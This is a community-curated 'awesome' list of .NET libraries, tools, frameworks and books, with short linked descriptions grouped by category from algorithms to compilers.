[![Build Status](https://github.com/quozd/awesome-dotnet/actions/workflows/awesome-bot.yml/badge.svg)](https://github.com/quozd/awesome-dotnet/actions/workflows/awesome-bot.yml)
[![Join the chat at https://gitter.im/quozd/awesome-dotnet](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/quozd/awesome-dotnet?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
A collection of awesome .NET libraries, tools, frameworks, and software.
Inspired by [awesome-ruby](https://github.com/markets/awesome-ruby), [awesome-php](https://github.com/ziadoz/awesome-php), [awesome-python](https://github.com/vinta/awesome-python), [frontend-dev-bookmarks](https://github.com/dypsilon/frontend-dev-bookmarks) and [ruby-bookmarks](https://github.com/dreikanter/ruby-bookmarks).
Contributions are always welcome! Please take a look at the [contribution guidelines and quality standard](https://github.com/quozd/awesome-dotnet/blob/master/CONTRIBUTING.md) pages first. We accept proprietary and commercial software too.
Thanks to all [contributors](https://github.com/quozd/awesome-dotnet/graphs/contributors), you're awesome and wouldn't be possible without you! The goal is to build a categorized community-driven collection of very well-known resources.
# License
[![CC0](https://licensebuttons.net/p/zero/1.0/88x31.png)](https://creativecommons.org/publicdomain/zero/1.0/)
To the extent possible under law, [Vitali Fokin](https://github.com/quozd) has waived all copyright and related or neighboring rights to this work.
# Table of Contents
* [Awesome DotNet](#awesome-dotnet)
* [Algorithms and Data Structures](#algorithms-and-data-structures)
* [API](#api)
* [Application Frameworks](#application-frameworks)
* [Application Templates](#application-templates)
* [Artificial Intelligence](#artificial-intelligence)
* [Assembly Manipulation](#assembly-manipulation)
* [Assets](#assets)
* [Authentication and Authorization](#authentication-and-authorization)
* [Blazor](#blazor)
* [Books](#books)
* [Build Automation](#build-automation)
* [Business Intelligence and Reporting](#business-intelligence)
* [Caching](#caching)
* [Calendar](#calendar)
* [Chat](#chat)
* [CLI](#cli)
* [CLR](#clr)
* [CMS](#cms)
* [Code Analysis and Metrics](#code-analysis-and-metrics)
* [Code Snippets](#code-snippets)
* [Compilers, Transpilers and Languages](#compilers-transpilers-and-languages)
* [Compression](#compression)
* [Continuous Integration](#continuous-integration)
* [Cryptography](#cryptography)
* [Database](#database)
* [Database Drivers](#database-drivers)
* [DateTime](#datetime)
* [Decompilation](#decompilation)
* [Deployment](#deployment)
* [DirectX](#directx)
* [Distributed Computing](#distributed-computing)
* [DLR](#dlr)
* [Documentation](#documentation)
* [E-Commerce and Payments](#e-commerce-and-payments)
* [Emulators](#emulators)
* [Environment Management](#environment-management)
* [ETL](#etl)
* [Event aggregator and messenger](#event-aggregator-and-messenger)
* [Exceptions](#exceptions)
* [Extensions libraries](#extensions)
* [Functional programming](#functional-programming)
* [Game](#game)
* [GIS](#gis)
* [Git Tools](#git-tools)
* [Graphics](#graphics)
* [GraphQL](#graphql)
* [GUI](#gui)
* [HTML and CSS](#html-and-css)
* [HTTP](#http)
* [IDE](#ide)
* [Image Processing](#image-processing)
* [Install Tools](#install-tools)
* [Internationalization](#internationalization)
* [Interoperability](#interoperability)
* [IoC](#ioc)
* [JavaScript Engines](#javascript-engines)
* [Logging](#logging)
* [Mail](#mail)
* [Machine Learning and Data Science](#machine-learning-and-data-science)
* [Markdown Processors](#markdown-processors)
* [Mathematics](#mathematics)
* [Media](#media)
* [Metrics](#metrics)
* [Micro Framework](#micro-framework)
* [Minification](#minification)
* [Misc](#misc)
* [MVVM](#mvvm)
* [Networking](#networking)
* [Object to object mapping](#object-to-object-mapping)
* [Office](#office)
* [OpenAI](#openai)
* [ORM](#orm)
* [Package Management](#package-management)
* [PDF](#pdf)
* [Profiler](#profiler)
* [Protocols](#protocols)
* [Push Notifications](#push-notifications)
* [Query Builders](#query-builders)
* [Queue](#queue)
* [RPC](#RPC)
* [Reactive Programming](#reactive-programming)
* [Real-time Communications](#real-time-communications)
* [Regular Expression](#regular-expression)
* [Scheduling](#scheduling)
* [SDK and API Clients](#sdk-and-api-clients)
* [Search](#search)
* [Serialization](#serialization)
* [SMS and Phone Calls](#sms-and-phone-calls)
* [State machines](#state-machines)
* [Static Site Generators](#static-site-generators)
* [Strong Naming](#strong-naming)
* [Style Guide](#style-guide)
* [Template Engine](#template-engine)
* [Testing](#testing)
* [Tools](#tools)
* [Trading](#trading)
* [UI Automation](#ui-automation)
* [Visual Studio Plugins](#visual-studio-plugins)
* [Web Browsers](#web-browsers)
* [Web Frameworks](#web-frameworks)
* [Web Servers](#web-servers)
* [WebSocket](#websocket)
* [Windows Services](#windows-services)
* [WPF](#wpf)
* [Parser Library](#parser-library)
* [Source Generator](#source-generator)
* [Other Lists](#other-lists)
* [Resources](#resources)
## Algorithms and Data structures
* [Algorithmia](https://github.com/SolutionsDesign/Algorithmia) - Algorithm and data-structure library for .NET 3.5 and up. Algorithmia contains sophisticated algorithms and data-structures like graphs, priority queues, command, undo-redo and more.
* [C# Algorithms](https://github.com/aalhour/C-Sharp-Algorithms) - A C# plug-and-play class-library project of standard Data Structures and Algorithms. It contains 35+ Data Structures and 30+ Algorithms designed as Object-Oriented isolated components.
* [Towel](https://github.com/ZacharyPatten/Towel) - data structures, algorithms, mathematics, metadata, extensions, console, measurements, and other useful stuff
* [Akade.IndexedSet](https://github.com/akade/Akade.IndexedSet) - A convenient data structure supporting efficient in-memory indexing and querying, including range queries and fuzzy string matching.
## API
* [Telegram.Bot](https://github.com/TelegramBots/Telegram.Bot) - .NET Client for [Telegram Bot API](https://core.telegram.org/bots/api)
* [TLSharp](https://github.com/sochix/TLSharp) - It's a perfect fit for any developer who would like to send data directly to Telegram users or write own custom Telegram client.
* [WTelegramClient](https://github.com/wiz0u/WTelegramClient) - Automate a user account on Telegram, using the latest version of [Telegram Client API](https://core.telegram.org/methods)
* [NancyFx](https://github.com/NancyFx/Nancy) - Lightweight, low-ceremony, framework for building HTTP-based services on .NET and Mono
* [ASP.NET Web API](https://dotnet.microsoft.com/apps/aspnet/apis) - Framework that makes it easy to build HTTP services that reach a broad range of clients, including browsers and mobile devices
* [Breeze](https://breeze.github.io/doc-net/) - API framework enabling rich data access by using the OData 3 protocol. Client libraries available for JavaScript and C#.
* [Mobius: C# API for Spark](https://github.com/Microsoft/Mobius) - Mobius adds C# language binding to Apache Spark, enabling the implementation of Spark driver code and data processing operations in C#.
* [ServiceStack](https://github.com/ServiceStack/ServiceStack) - Thoughtfully architected, obscenely fast, thoroughly enjoyable web services for all
* [Nelibur](https://github.com/Nelibur/Nelibur) - Nelibur is message based web service framework on the pure WCF. Nelibur simplifies creating high-performance and message-based web services and you certainly have all the power of the WCF.
* [WebAPI Contrib](https://github.com/WebApiContrib/WebAPIContrib) - Collection of open source projects to help improve your work with ASP.NET Web API
* [Xamarin.Essentials](https://docs.microsoft.com/en-us/xamarin/essentials/) - Xamarin.Essentials provides developers with cross-platform APIs for their mobile applications.
* [FFImageLoading - Fast & Furious Image Loading](https://github.com/luberda-molinet/FFImageLoading) - This Library to load images quickly & easily on Xamarin.iOS, Xamarin.Android, Xamarin.Forms, Xamarin.Mac / Xamarin.Tizen and Windows (UWP, WinRT)
* [Ocelot](https://github.com/ThreeMammals/Ocelot) - .NET core API Gateway
* [CommandQuery](https://github.com/hlaueriksson/CommandQuery) - Command Query Separation for 🌐ASP.NET Core ⚡AWS Lambda ⚡Azure Functions ⚡Google Cloud Functions 🌐ASP.NET Web API 2
* [Cloud Storage](https://github.com/managedcode/Storage):- This library provides a universal interface for accessing and manipulating data in different cloud blob storage providers (Azure Storage, AWS S3, Google Cloud Storage. It makes it easy to switch between providers or to use multiple providers simultaneously, without having to learn and use multiple APIs.
## Application Frameworks
* [.NET Boxed Framework](https://github.com/Dotnet-Boxed/Framework) - .NET Core Extensions and Helper NuGet packages
* [ASP.NET Boilerplate](https://github.com/aspnetboilerplate/aspnetboilerplate) - A starting point for new modern ASP.NET MVC web applications with best practices and most popular tools.
* [ABP](https://github.com/abpframework/abp) - The next generation of the ASP.NET Boilerplate web application framework.
* [Orleans](https://github.com/dotnet/orleans) - Orleans is a framework that provides a straight-forward approach to building distributed high-scale computing applications, without the need to learn and apply complex concurrency or other scaling patterns
* [Newbe.Claptrap](https://github.com/newbe36524/Newbe.Claptrap) - This is a set of server-side development frameworks with reactive, event sourcing and Actor pattern as basic theories. On top of this, developers can develop "distributed", "scale out", and "easy to test" application more simply.
* [CoreFX](https://github.com/dotnet/corefx) - The corefx repo contains the library implementation (called "CoreFX") for .NET Core. It includes System.Collections, System.IO, System.Xml and many other components.
* [CSLA .NET](https://github.com/MarimerLLC/csla) - business layer development framework https://cslanet.com/
* [Mono](https://github.com/mono/mono) - Open source ECMA CLI, C#, F#, VB and .NET implementation
* [Mono-Addins](https://github.com/mono/mono-addins) - Mono.Addins is a generic framework for creating extensible applications, and for creating add-ins which extend those applications
* [peasy](https://github.com/peasy/Peasy.NET) - Peasy is a middle tier framework that offers an easy to use and flexible rules engine and was designed to address common challenges such as concurrency handling, transactional support, fault tolerance, threading, scalability, async and multiple client support, and easy testability, all without a huge learning curve!
* [Plastic](https://github.com/sang-hyeon/Plastic) - Plastic provides encapsulation of things like Domain, Application Rules, Business Rules or Business Logic in Application. For this, Command pattern is used.
* [Signals](https://github.com/EmitKnowledge/Signals) - Signals is a .NET5 based framework which focuses on increasing the quality and productivity within development teams by providing them with tools, aspects and processes.
* [Spring.Net](https://github.com/spring-projects/spring-net) - Spring.NET is an open source application framework that makes building enterprise .NET applications easier
* [DotNetty](https://github.com/Azure/DotNetty) - DotNetty is a port of Netty, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients.
* [AspectCore Framework](https://github.com/dotnetcore/AspectCore-Framework) - AspectCore Framework is an Aspect-Oriented Programming based cross platform framework for .NET Core and .NET Framework. Core support for aspect-interceptor,dependency injection integration , web applications , data validation , and more.
* [HopFramework](https://github.com/DiegoTondim/hop-framework) - HopFramework is a framework to create projects easily applying Domain Driven Design and a lot of patterns to delivery a better solution.
* [Fusion](https://github.com/servicetitan/Stl.Fusion) - .NET Core and Blazor library that attempts to dramatically improve the way we implement real-time and high-load services by introducing a novel kind of "computed observables" - immutable, thread-safe, and most importantly, almost invisible for developers. [Samples 1](https://github.com/servicetitan/Stl.Fusion.Samples) [Samples 2](https://github.com/alexyakunin/BoardGames)
* [silky](https://github.com/liuhll/silky) - The Silky framework is designed to help developers quickly build a microservice development framework through simple code and configuration under the .net platform.
## Application Templates
* [.NET Boxed Templates](https://github.com/Dotnet-Boxed/Templates) - .NET project templates with batteries included, providing the minimum amount of code required to get you going faster.
* [ASP.NET Core Starter Kit](https://github.com/kriasoft/aspnet-starter-kit) - backend: .NET Core, EF Core, C#; frontend: Babel, Webpack, React, CSS Modules
* [ProjectScaffold](https://github.com/fsprojects/ProjectScaffold) - A prototypical .NET solution recommended by the F# Foundation---includes file system setup, Paket for dependencies and FAKE for build/test automation. By default, build process also compiles documentation and generates NuGet packages.
* [Serene](https://github.com/volkanceylan/Serenity) - Serenity is an ASP.NET MVC application platform designed to simplify and shorten development of data-centric business applications with a service-based architecture. Serene is a starter template to build Serenity applications.
* [Side-Waffle](https://github.com/LigerShark/side-waffle) - Large collection of useful templates for Web and Desktop development.
* [Template10](https://github.com/Windows-XAML/Template10) - Windows 10 templates with design patterns.
* [Nucleus](https://github.com/alirizaadiyahsi/Nucleus) - Vue startup application template that uses ASP.NET Core API layered architecture at the back-end and JWT based authentication
* [JHipster.NET](https://github.com/jhipster/jhipster-dotnetcore) JHipster blueprint for replace orginal SpringBoot Backend by asp.net core. The main goal generator of jhipster is showcases best practices of modern web development in java. So the goal of the project is to do the same in .net. The Frontend can be generated with angular or react and soon with blazor.
## Artificial Intelligence
* [AIMLBot (Program#)](http://aimlbot.sourceforge.net/) - A small, fast, standards-compliant yet easily customizable implementation of an AIML (Artificial Intelligence Markup Language) based chatter bot in C#.
* [SIML](https://simlbot.com/) - Synthetic Intelligence Markup Language, a next generation Chatbot & Digital Assistant Language.
## Assembly Manipulation
* [Fody](https://github.com/Fody/Fody) - Extensible tool for weaving .NET assemblies.
* [ILRepack](https://github.com/gluck/il-repack) - Open-source alternative to ILMerge.
* [Mono.Cecil](https://github.com/jbevain/cecil) - Cecil is a library to generate and inspect programs and libraries in the ECMA CIL form.
## Assets
* [Cassette](https://github.com/andrewdavey/cassette) - Manages .NET web application assets (scripts, css and templates)
* [NodeAssets](https://github.com/ajorkowski/NodeAssets) - Asset Manager for .NET that has live CSS updates using SignalR and can optionally leverage Node.js compilers
* [Bundle Transformer](https://github.com/Taritsyn/BundleTransformer) - Modular extension for [Microsoft ASP.NET Web Optimization Framework](https://www.nuget.org/packages/Microsoft.AspNet.Web.Optimization). Its modules supports LESS, Sass, CoffeeScript, TypeScript, Mustache, Handlebars, Autoprefixer along with a bunch of different JS and CSS minifiers.
* [Bundler](https://github.com/ServiceStack/Bundler) - Compile & Minify Less/Sass/Stylus/Css/JS/CoffeeScript/LiveScript files. Integrates with MVC and ServiceStack
* [SquishIt](https://github.com/jetheredge/SquishIt) - Lets you *easily* bundle some CSS and JavaScript
## Authentication and Authorization
* [ASP.NET Identity](https://github.com/aspnet/Identity/) - New membership system for ASP.NET applications
* [ASP.NET SAML](https://github.com/jitbit/AspNetSaml) - SAML authentication support for ASP.NET apps
* [DotNetOpenAuth](https://github.com/DotNetOpenAuth/DotNetOpenAuth) - A C# implementation of the OpenID, OAuth and InfoCard protocols
* [Logibit Hawk](https://github.com/logibit/logibit.hawk/) - A F# [Hawk](https://github.com/outmoded/hawk) authentication library
* [IdentityModel](https://github.com/IdentityModel) - Helper library for identity & access control in .NET 4.5 and MVC4/Web API.
* [IdentityServer](https://github.com/IdentityServer) - Extensible OAuth2 and OpenID Connect provider framework.
* [OAuth](https://github.com/danielcrenna/vault/tree/master/oauth) - A very lightweight library for generating OAuth 1.0a signatures written in C#
* [Stuntman](https://rimdev.io/stuntman/) - Stuntman is a library for impersonating users during development leveraging .NET Claims Identity.
* [openiddict](https://github.com/openiddict/openiddict-core) - Flexible and versatile OAuth 2.0/OpenID Connect stack for .NET
## Blazor
* [BootstrapBlazor](https://github.com/dotnetcore/BootstrapBlazor) - A set of enterprise-class UI components based on Bootstrap and Blazor.
* [ant-design-blazor](https://github.com/ant-design-blazor/ant-design-blazor) - A set of enterprise-class UI components based on Ant Design and Blazor WebAssembly.
* [MASA.Blazor](https://github.com/BlazorComponent/MASA.Blazor) - A set of enterprise-class UI components based on Material Design and Blazor WebAssembly.
* [Megabit.Blazorise](https://github.com/Megabit/Blazorise) - Blazorise is a component library built on top of Blazor and CSS frameworks like Bootstrap, Bulma and Material. Very easy to use.
* [blazork8s](https://github.com/weibaohui/blazork8s) - k8s management ui in blazor and .NET Core.
## Blockchain
* [Nethermind](https://github.com/NethermindEth/nethermind) - full Ethereum client in .NET Core
## Books
* [The Little ASP.NET Core Book](https://recaffeinate.co/book/) - A free, open-source, tutorial-based book aiming to provide a simple introduction to ASP.NET Core.
* [.NET in Action, Second Edition](https://www.manning.com/books/dotnet-in-action-second-edition) - An introduction to implementing full-featured, cross-platform professional applications on the Microsoft .NET platform. **[$]**
* [.NET Maui in Action](https://www.manning.com/books/dot-net-maui-in-action) - A book about creating mobile and desktop apps using a common set of .NET tools. **[$]**
* [ASP.NET Core in Action, Third Edition](https://www.manning.com/books/asp-net-core-in-action-third-edition) - Build professional-grade full-stack web applications using C# and ASP.NET Core. **[$]**
* [ASP.NET Core Razor Pages in Action](https://www.manning.com/books/asp-net-core-razor-pages-in-action) - A comprehensive guide to how to use Razor Pages to create dynamic websites that are easy to test and scale. **[$]**
* [ASP.NET Core Security](https://www.manning.com/books/asp-net-core-security) - A practical and hands-on guide to securing web applications built with ASP.NET. **[$]**
* [ASP.NET Core Web API](https://www.manning.com/books/asp-net-core-web-api) - A book about designing and implementing APIs using the REST and GraphQL standards. **[$]**
* [Blazor in Action](https://www.manning.com/books/blazor-in-action) - A guide to building UIs and client-side applications using C# and .NET. **[$]**
* [Building Web APIs with ASP.NET Core](https://www.manning.com/books/building-web-apis-with-asp-net-core) - Practical beginner’s guide to creating your first web APIs using ASP.NET Core. **[$]**
* [C# in Depth, Fourth Edition](https://www.manning.com/books/c-sharp-in-depth-fourth-edition) - deep dive into the details of the C# language. **[$]**
* [CLR via C#, Fourth Edition](https://www.microsoftpressstore.com/store/clr-via-c-sharp-9780735667457) - Dig deep and master the intricacies of the common language runtime, C#, and .NET development. **[$]**
* [Code Like a Pro in C#](https://www.manning.com/books/code-like-a-pro-in-c-sharp) - Build on your existing programming skills and upskill to professional-level C# programming. **[$]**
* [Dependency Injection in .NET](https://www.manning.com/books/dependency-injection-principles-practices-patterns) - teaches you to use Dependency Injection to reduce hard-coded dependencies between application components in .NET. **[$]**
* [Entity Framework Core in Action](https://www.manning.com/books/entity-framework-core-in-action) - teaches how to use Entity Framework Core, including lighter weight data access alternatives such as Dapper. **[$]**
* [Functional Programming in C#, Second edition](https://www.manning.com/books/functional-programming-in-c-sharp-second-edition) - Real world examples and practical techniques for functional programming in C# without the jargon and theory. **[$]**
* [Microservices in .NET Core, Second edition](https://www.manning.com/books/microservices-in-net-core-second-edition) - A comprehensive guide to building microservice systems using the .NET stack. **[$]**
* [Pro .NET 5 Custom Libraries](https://link.springer.com/book/10.1007/978-1-4842-6391-4) - Consists of sample projects for each data type implementation. Demonstrates implementation in C#. Covers dos and don'ts of each implementation. **[$]**
* [Pro .NET Benchmarking](https://link.springer.com/book/10.1007/978-1-4842-4941-3) - Provides an in-depth look at software benchmarking for accurate performance measurement. Helps you get maximum performance impact by identifying and targeting the right bottlenecks. Includes coverage of the latest compilers and processors. **[$]**
* [Pro .NET Framework with the Base Class Library](https://link.springer.com/book/10.1007/978-1-4842-4191-2) - Shows valuable tips and examples that reinforce the correct use of manage types, including how to avoid boxing/unboxing and better use of memory resources. **[$]**
* [Pro .NET Memory Management](https://link.springer.com/book/10.1007/978-1-4842-4027-4) - Takes a deep dive into .NET memory management, including comprehensive coverage of how .NET memory works, implementation details, possible pitfalls, and ways to work around them. **[$]**
* [Pro ASP.NET Core 6](https://link.springer.com/book/10.1007/978-1-4842-7957-1) - The most comprehensive coverage available on ASP.NET Core 6 in full-color. Detailed explanations and plenty of working code to learn new functionality. Provides a fully functioning ASP.NET Core 6 application that can be used as a template for projects. **[$]**
* [Pro Microservices in .NET 6](https://link.springer.com/book/10.1007/978-1-4842-7833-8) - Shows you how to get up to speed with .NET 6, Docker, and microservices. Teaches you how to leverage microservice design patterns to strengthen an application. Provides environment options for orchestrators and Azure Kubernetes Service. **[$]**
## Build Automation
* [Psake](https://github.com/psake/psake) - .NET-based build automation tool written in PowerShell
* [FAKE](https://github.com/fsharp/FAKE) - F# Make, a cross-platform build automation system
* [Invoke-Build](https://github.com/nightroman/Invoke-Build) - PowerShell build and test automation tool inspired by Psake.
* [MSBuild](https://github.com/dotnet/msbuild) - The Microsoft Build Engine (MSBuild) is the build platform for .NET and Visual Studio
* [Cake](https://github.com/cake-build/cake) - Cake (C# Make) is a cross-platform build automation system with a C# DSL.
* [Nake](https://github.com/yevhen/Nake) - Magic script-based C# task runner
* [Nuke](https://github.com/nuke-build/nuke) - Cross-platform build automation system
* [FlubuCore](https://github.com/dotnetcore/FlubuCore) - A cross platform build and deployment automation system for building projects and executing deployment scripts using C# code.
## Business Intelligence
* [FastReport](https://github.com/FastReports/FastReport) - The open source report generator for .NET Core 2.x/.Net Framework 4.x. FastReport can be used in ASP.NET MVC, Web API applications.
* [NReco PivotData](https://www.nrecosite.com/pivot_data_library_net.aspx) - in-memory data aggregation/OLAP library, pivot tables generation (render to HTML, exports), ASP.NET pivot builder control **[$][Free for single-deployment/non-SaaS]**
## Caching
* [CacheCow](https://github.com/aliostad/CacheCow) - An ASP.NET Web API HTTP caching implementation both on client and server
* [Akavache](https://github.com/reactiveui/Akavache) - An asynchronous, persistent key-value store
* [EasyCaching](https://github.com/dotnetcore/EasyCaching) - A caching library that contains basic and some advanced usages of caching which can help handle caching more easier!
* [CacheManager](https://github.com/MichaCo/CacheManager) - A common interface and abstraction layer for caching.
* [FastCache](https://github.com/jitbit/FastCache) - 10X faster alternative to `MemoryCache` for .NET
* [Foundatio](https://github.com/FoundatioFx/Foundatio#caching) - A common interface with in memory, Redis and hybrid implementations.
* [Cashew](https://github.com/joakimskoog/Cashew) - a .NET library for caching responses easily with an `HttpClient` through an API that is simple and elegant yet powerful.
* [Cache Tower](https://github.com/TurnerSoftware/CacheTower) - An efficient multi-layered caching system for .NET (In-Memory, Redis, Database, File etc)
* [FusionCache](https://github.com/jodydonetti/ZiggyCreatures.FusionCache) - An easy to use, high performance and robust cache with an optional distributed 2nd layer and some advanced features, like a fail-safe mechanism and advanced timeouts management
* [LazyCache](https://github.com/alastairtree/LazyCache) - A simple, developer friendly, in-memory thread-safe caching service. It leverages Microsoft.Extensions.Caching and Lazy to provide performance and reliability in heavy load scenarios.
## Calendar
* [iCal.NET](https://github.com/rianjs/ical.net) iCal.NET is an iCalendar (RFC 5545) class library for .NET aimed at providing RFC 5545 compliance, while providing full compatibility with popular calendaring applications and libraries.
# Chat
* [Stream](https://github.com/GetStream/stream-chat-net) Official .NET API client for Stream Chat, a service for building chat applications.
## CLI
* [Appccelerate - Command Line Parser](https://appccelerate.github.io/commandlineparser.html) - A command-line parser with fluent definition syntax, different argument types, required and optional arguments, value restrictions, aliases, type conversion and semi-automatic usage help message composition
* [Argu](https://github.com/fsprojects/Argu) - Declarative CLI argument & XML configuration parser for F# applications.
* [CliFx](https://github.com/Tyrrrz/CliFx) - Declarative framework for building command line interfaces.
* [Typin](https://github.com/adambajguz/Typin) - Simple to use declarative framework for interactive CLI applications and command line tools (direct mode) that has its roots in CliFx.
* [clipr](https://github.com/nemec/clipr) - A CLI library inspired by Python's argparse that transforms a command line into a strongly-typed object. It supports custom argument types, automated (and localized) help generation, and a variety of ways to store parsed arguments.
* [CliWrap](https://github.com/Tyrrrz/CliWrap) - Wrapper for command line interfaces.
* [Colorful.Console](https://github.com/tomakita/Colorful.Console) - Colorful console output.
* [CommandDotNet](https://github.com/bilal-fazlani/commanddotnet) - Model your console app using C# in a composable manner. Define commands with methods. Define subcommands with properties or nested classes. Extensible parsing and command execution.
* [Command Line Parser](https://github.com/commandlineparser/commandline) - The Command Line Parser Library offers to CLR applications a clean and concise API for manipulating command-line arguments and related tasks
* [CommandLineUtils](https://github.com/natemcmaster/CommandLineUtils) - This is a fork of Microsoft.Extensions.CommandLineUtils, which is no longer under active development.
* [CsConsoleFormat](https://github.com/Athari/CsConsoleFormat) - .NET C# library for advanced formatting of console output.
* [Docopt](https://github.com/docopt/docopt.net) - Command-line interface description language that will make you smile.
* [EntryPoint](https://github.com/Nick-Lucas/EntryPoint) - Composable CLI Argument Parser for .NET Core & .NET Framework 4.5+.
* [Fluent Command Line Parser](https://github.com/fclp/fluent-command-line-parser) - A simple, strongly typed .NET C# command-line parser library using a fluent easy to use interface
* [JustCli](https://github.com/jden123/JustCli) - That’s just a quick way to create your own command line tool.
* [Gui.cs](https://github.com/migueldeicaza/gui.cs) - Terminal UI toolkit for .NET.
* [Power Args](https://github.com/adamabdelhamed/PowerArgs) - PowerArgs converts command-line arguments into .NET objects that are easy to program against. It also provides a ton of optional capabilities such as argument validation, auto generated usage, tab completion, and plenty of extensibility
* [ReadLine](https://github.com/tonerdo/readline) - A GNU-Readline like library for .NET/.NET Core.
* [RunInfoBuilder](https://github.com/rushfive/RunInfoBuilder) - A unique command line parser, utilizing object trees for commands.
* [SharpNetSH](https://github.com/rpetz/SharpNetSH) - A simple netsh library for C#.
* [spectre.console](https://github.com/spectresystems/spectre.console) - A library that makes it easier to create beautiful console applications.
## CLR
* [Runtime](https://github.com/dotnet/runtime) - Mono and CoreCLR .NET runtimes, as well as the standard library and some higher level components like `System.Linq` and `System.Text.Json`.
## CMS
* [Composite C1](https://github.com/Orckestra/C1-CMS-Foundation) - A web CMS that focus on UX and adaptability
* [mojoPortal ](https://github.com/i7media/mojoportal) - MojoPortal is an extensible, cross database, mobile friendly, web content management system (CMS) and web application framework written in C# ASP.NET
* [N2CMS](https://github.com/n2cms/n2cms) - Open source, lightweight, code-first CMS able to seamlessly integrate into any MVC project.
* [Orchard ](https://github.com/OrchardCMS/Orchard) - Free, open source, community-focused project aimed at delivering applications and reusable components on the ASP.NET platform
* [Piranha CMS](https://github.com/PiranhaCMS/Piranha) - Piranha is the fun, fast and lightweight .NET framework for developing cms-based web applications with an extra bite. It's built on ASP.NET MVC and Web Pages and is fully compatible with both Visual Studio and WebMatrix. https://piranhacms.org
* [Umbraco](https://github.com/umbraco/Umbraco-CMS) - Umbraco is a free open source Content Management System built on the ASP.NET platform
* [DotNetNuke](https://www.dnnsoftware.com/community/download) - DNN Platform is our free, open source web CMS and the foundation of every professional DNN solution. Over 750,000 organizations worldwide have built websites powered by the DNN Platform.
* [BlogEngine.NET](https://github.com/rxtur/BlogEngine.NET) - Simple but full featured ASP.NET blog
* [Squidex](https://github.com/Squidex/squidex) ![GitHub stars](https://img.shields.io/github/stars/Squidex/squidex?style=flat-square&cacheSeconds=604800) ![GitHub stars](https://img.shields.io/github/last-commit/Squidex/squidex?style=flat-square&cacheSeconds=86400) - Open source headless CMS and content management hub. https://squidex.io
## Code Analysis and Metrics
* [.NET Compiler Platform ("Roslyn") Analyzers](https://github.com/dotnet/roslyn-analyzers) - A number of Roslyn diagnostic analyzers initially developed to help flesh out the design and implementation of the static analysis APIs.
* [PVS-Studio](https://pvs-studio.com/en/pvs-studio/) - PVS-Studio is a static analyzer on guard of code quality, security (SAST), and code safety. **[[Free for OSS](https://pvs-studio.com/en/order/open-source-license/)]** **[$]**
* [NDepend](https://www.ndepend.com) - is a Visual Studio and VS Team Services extension that estimates your .NET code quality and Technical-Debt, that lets create code rules with C# LINQ syntax, visualize code structure and focus on changes and evolution. **[$]**
* [App.Metrics](https://github.com/AppMetrics/AppMetrics) - App Metrics is an open-source and cross-platform .NET library used to record and report metrics within an application and reports it's health. See the [docs](https://www.app-metrics.io/) for me details.
* [CodeMaid](http://www.codemaid.net/) - Visual studio extension to cleanup, dig through and simplify C#, C++, F#, VB, PHP, JSON, XAML, XML, ASP, HTML, CSS, LESS, SCSS, JavaScript and TypeScript coding.
* [StyleCop](https://github.com/StyleCop) - StyleCop analyzes C# source code to enforce a set of style and consistency rules
* [Gendarme](https://github.com/spouliot/gendarme) - Extensible rule-based tool to find problems in .NET applications and libraries
* [Metrics-Net](https://github.com/Recognos/Metrics.NET) - Capturing CLR and application-level metrics. So you know what's going on.
* [AspNet.Metrics](https://github.com/alhardy/aspnet-metrics) - Capturing CLR, application-level web request metrics. Middleware and extensions using Metrics-Net
* [BenchmarkDotNet](https://github.com/dotnet/BenchmarkDotNet) - Powerful .NET library for benchmarking.
* [Bencher](https://bencher.dev/) - Suite of continuous benchmarking tools designed to catch performance regressions in CI.
* [Codinion](https://www.codinion.com/) - Enhanced syntax highlighting for C# and some other "Visual" features. **[$]**
* [NsDepCop](https://github.com/realvizu/NsDepCop) - Static code analysis tool to enforce namespace dependency rules in C# projects.
* [WebBen](https://github.com/omerfarukz/WebBen) - Is a tool for benchmarking your Hypertext Transfer Protocol (HTTP) server.
## Code Snippets
* [.NET Fiddle](https://dotnetfiddle.net/) - Write, compile and run C#, F# and VB code in the browser. The .Net equivalent of JSFiddle.
* [Sharplab](https://sharplab.io/) - Run C# code using different branches and versions of Roslyn, see the IL that was produced and examine the JIT's output.
## Compilers, Transpilers and Languages
* [ClojureCLR](https://github.com/clojure/clojure-clr) - A port of Clojure to the CLR, part of the Clojure project
* [F#](https://github.com/fsharp/fsharp/) - The F# compiler, core library and tools - a functional programming language for safer, faster, better code writing.
* [Hybridizer](https://www.altimesh.com/hybridizer-essentials/) - CIL (C#, VB.Net, F#) to CUDA compiler. **[$]**
* [IronScheme](https://github.com/IronScheme/IronScheme) - R6RS Scheme compiler, runtime and many standard libraries
* [JSIL](https://github.com/sq/JSIL) - CIL to JavaScript Compiler http://jsil.org/
* [Mond](https://github.com/Rohansi/Mond) - A dynamically typed scripting language written in C# with a REPL, debugger, and simple embedding API.
* [Mono-basic](https://github.com/mono/mono-basic) - Visual Basic Compiler and Runtime
* [Nemerle](https://github.com/rsdn/nemerle) - Nemerle is a high-level statically-typed programming language for the .NET platform. It offers functional, object-oriented and imperative features. It has a simple C#-like syntax and a powerful meta-programming system.
* [Netjs](https://github.com/praeclarum/Netjs) - .NET to TypeScript and JavaScript compiler. Portable Class Libraries work great for this. You can even pass EXEs.
* [P](https://github.com/p-org/P) - P is a language for asynchronous event-driven programming.
* [PeachPie](https://github.com/peachpiecompiler/peachpie) - PeachPie is a PHP compiler and runtime for .NET and .NET Core, which allows entire PHP applications to run on the modern, secure and performant .NET and .NET Core platforms.
* [Roslyn](https://github.com/dotnet/roslyn) - The .NET Compiler Platform ("Roslyn") provides open-source C# and Visual Basic compilers with rich code analysis APIs. It enables building code analysis tools with the same APIs that are used by Visual Studio.
* [Testura.Code](https://github.com/Testura/Testura.Code) - Wrapper around the Roslyn API and used for generation, saving and compiling C# code. It provides methods and helpers to generate classes, methods, statements and expressions.
* [VisualFSharp](https://github.com/dotnet/fsharp) - The Visual F# compiler and tools
* [Fable](https://github.com/fable-compiler/Fable) - F# to JavaScript Compiler
* [LinqOptimizer](https://github.com/nessos/LinqOptimizer) - An automatic query optimizer-compiler for Sequential and Parallel LINQ
* [Roslyn-linq-rewrite](https://github.com/antiufo/roslyn-linq-rewrite) - Compiles C# code by first rewriting the syntax trees of LINQ expressions using plain procedural code, minimizing allocations and dynamic dispatch.
* [Iron python](https://github.com/IronLanguages/ironpython2) - A python 2 implementation that is integrated with the dot net framework.
